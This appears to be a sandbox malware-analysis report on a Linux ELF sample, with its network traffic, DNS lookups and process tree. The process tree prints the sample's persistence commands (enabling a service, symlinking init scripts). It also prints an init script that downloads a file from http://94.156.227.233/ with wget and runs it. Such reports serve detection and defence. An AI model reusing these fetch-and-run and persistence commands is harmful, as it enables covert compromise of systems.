                                                                          Dec 24, 2024 05:29:53.218904972 CET4469638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:53.383821964 CET382424469694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:53.838316917 CET382424469694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:53.838491917 CET4469638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:54.220247030 CET4469838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:54.339869022 CET382424469894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:54.340044975 CET4469838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:54.340044975 CET4469838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:54.459638119 CET382424469894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:29:54.845038891 CET4469838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:29:55.007884979 CET382424469894.156.227.234192.168.2.13
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 24, 2024 05:27:51.073003054 CET4574453192.168.2.131.1.1.1
                                                                          Dec 24, 2024 05:27:51.073050976 CET4947153192.168.2.131.1.1.1
                                                                          Dec 24, 2024 05:27:51.290028095 CET53457441.1.1.1192.168.2.13
                                                                          Dec 24, 2024 05:27:51.294199944 CET53494711.1.1.1192.168.2.13
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 24, 2024 05:27:51.073003054 CET192.168.2.131.1.1.10x5663Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                          Dec 24, 2024 05:27:51.073050976 CET192.168.2.131.1.1.10x25b2Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 24, 2024 05:27:51.290028095 CET1.1.1.1192.168.2.130x5663No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                                          Dec 24, 2024 05:27:51.290028095 CET1.1.1.1192.168.2.130x5663No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                                                          System Behavior

                                                                          Start time (UTC):04:27:48
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:/tmp/x86_32.nn.elf
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:48
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:48
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:48
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:48
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl enable custom.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/bin/chmod
                                                                          Arguments:chmod +x /etc/init.d/system
                                                                          File size:63864 bytes
                                                                          MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/bin/ln
                                                                          Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                          File size:76160 bytes
                                                                          MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/bin/chmod
                                                                          Arguments:chmod +x /etc/init.d/sh
                                                                          File size:63864 bytes
                                                                          MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/bin/mkdir
                                                                          Arguments:mkdir -p /etc/rc.d
                                                                          File size:88408 bytes
                                                                          MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/bin/ln
                                                                          Arguments:ln -s /etc/init.d/sh /etc/rc.d/S99sh
                                                                          File size:76160 bytes
                                                                          MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/tmp/x86_32.nn.elf
                                                                          Arguments:-
                                                                          File size:79312 bytes
                                                                          MD5 hash:7a8c8bd1879880b4910dc8511392a718

                                                                          Start time (UTC):04:27:48
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):04:27:48
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File size:22760 bytes
                                                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Start time (UTC):04:27:49
                                                                          Start date (UTC):24/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4